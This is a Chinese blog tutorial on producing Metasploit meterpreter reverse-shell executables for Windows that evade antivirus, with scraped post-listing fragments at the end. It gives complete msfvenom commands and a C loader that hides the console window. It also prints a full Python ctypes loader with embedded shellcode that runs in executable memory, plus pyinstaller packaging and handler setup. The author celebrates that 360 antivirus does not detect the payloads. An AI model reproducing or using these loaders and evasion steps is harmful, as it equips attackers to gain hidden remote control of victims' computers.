精华内容
下载资源
问答
  • MSF 生成静态免杀shell(win)

    千次阅读 2018-01-26 17:25:26
    NO.1 利用工具 msf msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和...1.使用msfvenom生成shellcode msfvenom -

    NO.1

    利用工具

    1. msf

      msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。

    2. vc++

      c编译器

    实现过程

    1.使用msfvenom生成shellcode

    msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b\x00’ lhost=192.168.68.129 lport=3333   -f c -o /root/Desktop/shell/shell.c
      -p : 指定payload; -e :指定编码方式; -i :编译次数; -b :去除指定代码,一般是空代码或者错误代码; lhost :指定本机IP; -lport :指定本机监听端口; -f :指定生成格式; -o指定生成输出后存储文件的位置

    上图
    这里写图片描述
    这里写图片描述
    2. 加入入口函数,开始编译

    main()
    {
    ((void(*)(void))&buf)();
    }

    上图
    这里写图片描述
    执行后会在下方有显示,不成功会报错,成功会提示error为0(3是开始执行,这里我没点,我待会手动运行)
    这里写图片描述
    最后会在你原文件存在的目录生成exe可执行文件
    这里写图片描述
    编译ok
    3. 开始监听

    msfconsole   //运行msf
    use exploit/multi/handler   //使用handler模块
    set lhost 192.168.68.129   //这里的IP需要和exp中IP一致
    set lport 3333            //端口与IP一样要和上面的端口一致
    set payload windows/meterpreter/reverse_tcp  //指定payload
    exploit                   //开始监听

    上图
    这里写图片描述
    4. 运行exe,看是否免杀
    这里写图片描述
    可以看到监听到IP
    这里写图片描述
    查看返回的session
    这里写图片描述
    运行成功,360没有报毒
    但是有没有发现运行exe文件会弹出一个命令框,这样很容易就被发现了,所以需要对这个exp进行完善,所以请看number tow

    NO.2

    前面的步骤都一样,在编译时多添几行代码

    #include<stdio.h>
    #include<windows.h>
    #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")    //禁止弹窗

    上图
    这里写图片描述
    运行监听
    这里写图片描述
    360没报毒
    这里写图片描述
    OK;
    以上呢都是c编译的,还有一种方法,可以使用Python编译生成exp,详细见number three

    NO.3

    利用工具

    1. msf
    2. Python2

    实现过程

    1.生成.py的shellcode

    msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b\x00’ lhost=192.168.68.129 lport=3333   -f py -o /home/shell/test001.py

    上图
    这里写图片描述
    2.调整原文件准备编译(Python调用一些c代码)

    from ctypes import *
    import ctypes
    buf =  ""
    buf += "\xdb\xc1\xd9\x74\x24\xf4\x5e\x33\xc9\xb8\xdd\x73\xed"
    buf += "\x2b\xb1\x9e\x31\x46\x19\x03\x46\x19\x83\xee\xfc\x3f"
    buf += "\x86\x57\x95\x96\xca\x2e\x31\x25\xd5\x5b\xe2\x41\xbe"
    buf += "\x8a\x23\x18\xa8\xfc\xe3\x4f\xd4\xae\x16\xec\x1a\x4a"
    buf += "\xfb\xb9\x6e\x34\xa4\xfa\xac\x27\x87\x17\xd8\x46\xa1"
    buf += "\x12\x44\x09\xc5\x34\xd5\xd5\xa5\x8d\x05\xfa\x48\x9a"
    buf += "\xae\x70\x93\x9c\x32\x24\x38\x94\x3b\x48\x62\xb4\x9a"
    buf += "\x18\xd4\xb9\xa6\xa0\xec\x88\x85\xe6\xc5\xdd\xe0\x3d"
    buf += "\x7a\x28\xa3\xc5\x30\x63\x7d\x57\xe6\x34\xe2\xbc\xd5"
    buf += "\x09\xe9\x86\xfe\xad\xd0\x7c\x8a\x95\x63\x3c\x81\xbd"
    buf += "\x85\x9e\x01\xb2\x1f\x52\xb2\xdf\x56\x87\x34\x37\x98"
    buf += "\x1b\xf2\x7b\xc5\x37\x88\x47\x95\x68\xf9\x68\x0a\x0a"
    buf += "\x15\x0b\x8a\xf1\x3f\x98\x2b\xf3\x84\xeb\x0d\xd6\x50"
    buf += "\x8c\xca\x1a\x62\x80\x64\x5e\xbf\x5c\x81\x01\x36\x59"
    buf += "\xc0\xa4\x87\x38\x24\x42\xda\xaf\xc2\x87\x2e\x04\xec"
    buf += "\xfb\xb5\x76\x17\x2e\xb8\x7b\x82\x88\x0e\x1e\x8d\x4f"
    buf += "\xc9\x16\xf6\x2f\x87\x61\x6e\xf4\xe3\x93\xe4\xeb\x2f"
    buf += "\x58\x0a\xd1\x5b\xac\xd6\xaf\x3b\x3b\xf4\x7b\x76\xf3"
    buf += "\x67\x55\x0a\x7a\x32\x4a\x10\xc5\xbf\x8f\x20\xee\xaf"
    buf += "\x92\x40\xb9\x99\x67\xbc\xb6\xd5\x53\xba\xfb\x03\x32"
    buf += "\x34\x27\xce\x73\x4f\x12\x66\xe7\xcb\xd7\xca\xad\x31"
    buf += "\xd9\x79\x5d\x15\xce\x66\x59\x24\x0d\x5c\x11\x24\xef"
    buf += "\x45\x09\x84\xfe\x36\x2a\x77\x49\x45\x63\xe5\xc9\xf7"
    buf += "\x06\xcc\x73\xb8\x00\xe4\x42\x34\x16\x9c\xe5\x98\x84"
    buf += "\x91\x58\x48\x5e\xc1\xb0\xff\xb5\xa9\x6e\xa0\xf0\x26"
    buf += "\xe0\x4d\x27\xd7\x2c\x74\xaf\xa6\x51\x67\x38\xb4\x70"
    buf += "\x25\xb6\x55\xee\x98\xc3\xfd\x26\xaf\x12\x41\x11\x93"
    buf += "\xd6\x45\x59\x51\x05\x94\x87\x68\xea\xfb\x03\x1b\x03"
    buf += "\x91\x45\xd7\x6e\x96\x1c\xe9\x7a\x0d\x6e\xa5\xf2\xc5"
    buf += "\x03\x80\x9f\xcf\xe9\xc1\x8c\x90\x22\x6a\x04\xb2\x5c"
    buf += "\x56\x42\x27\x87\xc8\x06\xa5\x5d\x04\xa4\x1a\x04\x07"
    buf += "\xea\x3c\x46\xe6\x06\x99\xdb\xc6\x75\xb1\x8a\x20\x10"
    buf += "\x27\xed\xde\x42\xdd\x40\xfa\x7b\x64\x70\x4f\x0d\xed"
    buf += "\xf2\xb9\x42\x98\x9b\x41\xc6\x38\x04\xd9\x58\xe9\x77"
    buf += "\x4c\x06\xdf\x5c\xe4\x9a\x28\x4c\xd4\x41\xcd\x17\xa5"
    buf += "\x9a\x82\x36\xe4\x94\x0c\x92\xae\xc5\x7e\x8c\x8d\xd6"
    buf += "\x32\x75\xef\x0d\xdb\x3d\xe5\xae\xca\x45\xfb\xe9\x79"
    buf += "\x48\xaf\xca\xf1\xca\xb0\xe7\x5c\x39\x4f\xc3\x4c\x28"
    buf += "\x35\xa6\x13\x08\x59\xd7\x0a\x3e\x58\xa4\xa8\xc0\x22"
    buf += "\x70\xfd\xfd\x0f\x43\x86\x2a\xcd\x55\x6d\x7f\x8b\x49"
    buf += "\x82\xaa\x40\xbe\xf6\xc6\x32\xa9\x60\xb0\x19\x52\xf7"
    buf += "\xc8\xdf\x50\x58\xc1\xcc\xf4\x8b\x0b\x16\xe5\x79\xae"
    buf += "\xf3\x1c\x2b\x93\x8a\xbe\xc5\x03\x51\xb0\xbf\x5a\x2a"
    buf += "\x7d\x94\xf3\x18\xb5\xda\xe2\x10\xfa\xab\x66\x82\x5f"
    buf += "\x21\xb7\x09\xaf\x27\x37\xcf\xd5\x64\x47\x92\x71\x47"
    buf += "\xcb\x97\xb2\xd8\xfa\xe0\x97\x06\x71\x6d\xd6\xf2\xb4"
    buf += "\x1b\x60\xb4\xcd\x7a\xd0\xc1\x1d\x46\x92\x64\x95\x25"
    buf += "\x60\xd4\xff\x87\x2b\x02\xab\xfc\xd2\x47\x17\x89\x0c"
    buf += "\x54\x6d\x36\xff\x00\x31\xfc\x09\x05\xaf\x02\x7d\x7d"
    buf += "\x7b\xcd\x09\x67\xa6\x7d\xb2\x4b\x57\x73\x91\x4d\x06"
    buf += "\xca\xd3\x05\xd1\x73\x01\x66"
    #libc = CDLL('libc.so.6')
    PROT_READ = 1
    PROT_WRITE = 2
    PROT_EXEC = 4
    def executable_code(buffer):
        buf = c_char_p(buffer)
        size = len(buffer)
        addr = libc.valloc(size)
        addr = c_void_p(addr)
        if 0 == addr: 
            raise Exception("Failed to allocate memory")
        memmove(addr, buf, size)
        if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
            raise Exception("Failed to set protection on buffer")
        return addr
    VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
    VirtualProtect = ctypes.windll.kernel32.VirtualProtect
    shellcode = bytearray(buf)
    whnd = ctypes.windll.kernel32.GetConsoleWindow()   
    if whnd != 0:
           if 1:
                  ctypes.windll.user32.ShowWindow(whnd, 0)   
                  ctypes.windll.kernel32.CloseHandle(whnd)
    memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                              ctypes.c_int(len(shellcode)),
                                              ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    old = ctypes.c_long(1)
    VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                         buf,
                                         ctypes.c_int(len(shellcode)))
    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
    shell()

    3.执行Python命令进行编译生成可执行文件exe

    python pyinstaller.py --console --onefile test001.py

    这里写图片描述
    4.msf中监听查看结果
    这里写图片描述
    完成;360一直安静着没什么动静

    end

    开启 exe运行,360不会报错,进程也一直都在,但是当我们 执行一些恶意命令的时候360会报出提示,但是运行的进程没有被杀,所以我们上面做到的只时一个简单的静态免杀,想要达到完整的攻击 效果还需要进行动态免杀,关于动态免杀敬请期待下篇博客;谢谢

    展开全文
  • msf生成后门拿shell

    2019-05-24 10:20:00
    0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧 kali 172.18.5.118 靶机 172.18.5.240 先尝试能不能ping通 好的可以 那我们进行下一步 0X01爱之初体验 先在kali终端...

     

    0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧

    kali 172.18.5.118

    靶机  172.18.5.240

    先尝试能不能ping通

    好的可以 那我们进行下一步

    0X01爱之初体验

    先在kali终端输入msfvenom -l,打开payload目录

    然后找到payload windows/meterpreter/reverse_tcp

    输入以下命令生成后门qq.exe

     

     然后将生成的qq.exe移到靶机然后打开msfconsole

     使用该攻击模块监听 use exploit/multi/handler

    然后设置payload

     

     

     在show options 发现还有未设置的

    设置LHOSTkali地址

    然后run开始监听

     

     

    这时我们打开靶机qq.exe文件就能看到Kali这边获取到一个Session

    输入jobs退出继续输入sessions -l查看session列表

    这里有一个session列表,sessionid1

    我们输入sessions -i 1,与该session交互

    输入getuid查看用户信息

    输入systinfo获取系统信息

    输入shell即可获取win7shell

    不过用这样方式拿的shell普遍都是很低的,还需提权

     

    转载于:https://www.cnblogs.com/-zhong/p/10916483.html

    展开全文
  • 利用msf生成后门拿shell

    万次阅读 2017-11-15 23:20:05
    kali x64:192.168.26.136 win7 x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload ...输入以下命令生成后门qq.exe ...然后将生成的qq.exe移到win7中,然后打开msf
    kali  x64:192.168.26.136
    win7  x86: 192.168.26.128


    先在kali终端输入msfvenom -l,打开payload目录

    然后找到payload windows/meterpreter/reverse_tcp

    输入以下命令生成后门 qq.exe

    然后将生成的qq.exe移到win7然后打开msfconsole

    使用该攻击模块监听 use exploit/multi/handler

      然后设置 payload


    show options 查看选项

    设置 LHOST kali 地址

    然后run开始监听


    这时我们打开win7qq.exe文件

    就能看到 Kali 这边获取到一个 Session


    输入jobs退出继续输入sessions -l查看session列表

    这里有一个session列表,sessionid1

    我们输入 sessions -i 1, 与该 session 交互


    输入getuid查看用户信息


    输入systinfo获取系统信息


    输入shell即可获取win7shell

    不过用这样方式拿的shell普遍都是很低的,还需提权


    展开全文
  • 生成shell.exe木马文件 sudo su 使用一个编码器: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /...

    实验环境:

    攻击机:kali linux-2021.1(192.168.56.128)

    靶机:Windows10(192.168.1.120)

    推荐两个免费在线木马检测网站:VirusScanVirusTotal

    原理图:

    1. Meterpreter简介

    • Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道,使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接,Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统,在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。
    • Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。其中,攻击者与目标设备中Meterpreter的通信是通过Stager套接字实现的。meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。
    • 需要说明的meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令。
    • Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。除上述外,Meterpreter还支持Ruby脚本形式的扩展。

    2. 生成shell.exe木马文件

    sudo su

    使用一个编码器:

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/shell.exe

    VirusScan上检查一下木马程序:

    可以看到总共50个查杀引擎,有25个查出了病毒,也就是说免杀率只有50%,效果一般般!

    使用两个编码器组合编码:

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/shell2.exe

    同样在VirusScan上检查一下木马程序:

    可以看到50个查杀软件有15个查出来了病毒,70%的免杀率,比一次编码的效果要好!

    使用一个编码器和两个编码器的区别:理论上使用两个编码器的免杀效果更好,但使用两个编码器编码时花的时间更长,且编码后的程序也更大。

    参数介绍:

    • -a:指定架构如 x86 x64。 x86 代表 32 位, x64 代表 64 位。 32 位软件可以在 64 位系统上运行。 所以我们生成 32 位的后门,这样在 32 位和 64 位系统中都可以使用。
    • --platform:指定平台,这里选择 windows,通过 --l platforms 可以查看所有支持的平台
    • -p:设置攻击载荷,我们使用 windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所 有攻击载荷
    • LHOST:目标主机执行程序后连接我们 Kali 的地址
    • LPORT:目标主机执行程序后连接我们 Kali 的端口
    • -b:去掉坏字符,坏字符会影响 payload 正常执行。 扩展:\x00 代表16进制的“00”组成的字符串。通过ASCII码换成能识别的就是:"00" - "00000000" - NUL。由于"00000000"是不可见字符,所以代码中没用。
    • -e:指定编码器,也就是所谓的免杀,x86/shikata_ga_nai 是 msf 自带的编码器,可以通过 -l encoders 查看所有编码器
    • -i:指定 payload 有效载荷编码迭代次数。 指定编码加密次数,为了让杀毒软件,更难查出源代码
    • -f:指定生成格式,可以是 raw,exe,elf,jar,c 语言的,python 的,java 的……,用 -l formats 查看所有支持的格式
    • -o:指定文件名称和导出位置。 指定到网站根目录/var/www/html,方便在肉机上下载后门程序y

    3. 在 MSF 上启动 handler 开始监听后门程序

    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.56.128
    set LPORT 4444
    run

    4. 在 Kali 上启动 apache 为靶机提供后门程序下载

    新建一个命令行终端,然后输入:

    systemctl start apache2

    5. 打开 Win10 访问 Kali 搭建的 Web 服务下载木马文件。

    • win10的浏览器中输入 http://192.168.56.128/shell.exe 下载shell.exe木马程序。

    双击运行shell.exe程序:(点更多信息->仍要运行)

     

     

    6. 在 MSF 终端查看建立的 session

    运行完shell.exe程序,返回kali命令行中可以看到meterpreter会话已经建立成功:

    接下来就可以使用meterpreter命令进行一顿乱操作了(例如 屏幕截图,摄像头拍照,远程控制,获取键盘信息,获取系统信息等等)![滑稽]。戳我查看meterpreter命令大全

    7. 在软件中加入后门程序

    由于制作的shell.exe文件运行是没有任何反应的,且会被Microsoft Defender阻止应用启动,这样会被别人怀疑并杀掉这个进程,那么你的会话就会中断。这个时候我们就需要将木马程序绑定在其它软件程序中,在别人运行其它软件时带着我们的木马程序偷偷的运行,而不会被发现!

    关注公众号[人人皆是程序猿],回复【KB】获取软件链接。

    下载软件后解压,先查看主程序会调用哪些附加的小程序,然后把后门和这些小程序绑定到一起。当然也可以直接加到主程序上,但是加主程序上,有时后会报错。 当 QvodPlayer.exe 主程序运行时,会自动调用 QvodTerminal.exe 这个小程序。我们的目标就是将后门和QvodTerminal.exe绑定在一起!

    • 将QvodTerminal.exe复制到kali中
    • 打开命令行输入:
    sudo su
    • 生成绑定后门的QvodTerminal.exe程序
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.128 LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -x QvodTerminal.exe -f exe -o /var/www/html/QvodTerminal.exe
    • 在靶机(win10)浏览器上访问:http://192.168.56.128/QvodTerminal.exe 下载 QvodTerminal.exe,将下载的 QvodTerminal.exe 替换原文件中的 QvodTerminal.exe
    • 重复第3步开启监听
    • 双击运行QvodPlayer.exe就可以成功建立会话了

    附:msf还可以生成 .c .py格式的攻击载荷,在这里我就不列举了出来!有兴趣的可以自行百度。

    目前渗透只能在内网里自己yy多没意思,下面介绍msf外网渗透教程:渗透测试(二)-Metasploit生成免杀后门(外网篇)

    青年时种下什么,老年时就收获什么。

     ——易卜生
    展开全文
  • MSF 生成shell命令

    2019-10-07 10:54:48
    MSF 生成在 Linux 下反弹的 Meterpreter Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell MSF 生成反弹 Shell (C ...
  • msf生成win版免杀木马

    千次阅读 热门讨论 2019-01-24 21:06:57
    在linux下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /mo.py 查看下py的内容 将buf值全部替换...
  • MSF生成meterpreter及静态免杀

    千次阅读 2018-01-26 17:23:27
    1.静态免杀 1.1编译c文件,静态免杀 1.1.1 生成shellcode 在kali命令行输入 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /...
  • msf 生成 shellcode 利用 python 加载 免杀 前言 网上有很多教程,但是可能教程中的payload 放到本地就是没有办法跑起来 例如这种报错就是shellcodeloader的问题 # 商业转载请联系作者获得授权,非商业转载请注明...
  • msf生成的攻击载荷进行免杀处理

    千次阅读 2018-04-30 13:41:58
    使用MSF编码器避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成的攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认...
  • Kali渗透-MSF木马免杀技术

    千次阅读 多人点赞 2020-03-27 10:34:43
    1、在 Kali 中直接使用 Msfvenom 生成木马文件,不做任何免杀处理,如下图所示: 2、在 Kali 开启 Apache 服务,同一局域网内的 Win 10 物理主机访问木马文件,尝试下载: 3、结果 Win 10 物理主机的火绒安全软件...
  • [远控免杀]msf生成木马的信息储备

    千次阅读 2020-08-09 17:37:13
    v, --var-name 指定一个自定义的变量,以确定输出格式 --shellest 最小化生成payload -h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表 2.可使用的payload Framework Payloads (560 total) [--...
  • 使用shellcode打造MSF免杀payload

    千次阅读 2019-06-21 17:13:00
    经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。 0x01 从哪里开始 shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为...
  • 在靶机运行我们的shellcode文件前,来个小插曲我们用360检验下它看能否免杀。 结果显示360杀毒并未进行查杀,所以我们绕过了杀毒软件。然后在靶机运行该.exe程序。kali立马监测到连接建立。输入sessions -i...
  • 环境:  kali-linux-2018.2-amd.iso   Visual Studio 2017  msfvenom ...//生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
  • 利用metasploit生成免杀后门

    千次阅读 2018-01-26 18:21:04
    免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软 静态免杀 静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、...
  • Metasploit+python生成免杀exe过360杀毒1在kali下生成一个反弹的msf的python脚本,命令如下:msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt...
  • BT5 msf msfpayload生成2进制 msf生成exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.85.147 LPORT=4444 X >/root/Desktop/mt.exe其它脚本msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195...
  • msf web脚本反弹shell

    2018-06-09 00:25:00
    msf>msfpayloadphp/reverse_phpLHOST=x.x.x.xLPORT=2333R>re.php msf>usemulti/handler msfexploit(handler)>setPAYLOADphp/reverse_php msfexploit(handler)>setLHOST...
  • 里面集成了msfpayload和msfencode 3.1生成window下后門程序 使用以下模塊生成windows系統下后門程序。 windows/meterpreter/reverse_tcp 生成木馬程序時如果可以指定也可以不指定--arch x86 --platform windows,不...
  • //需要签名 msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 4,908
精华内容 1,963
关键字:

msf生成免杀shell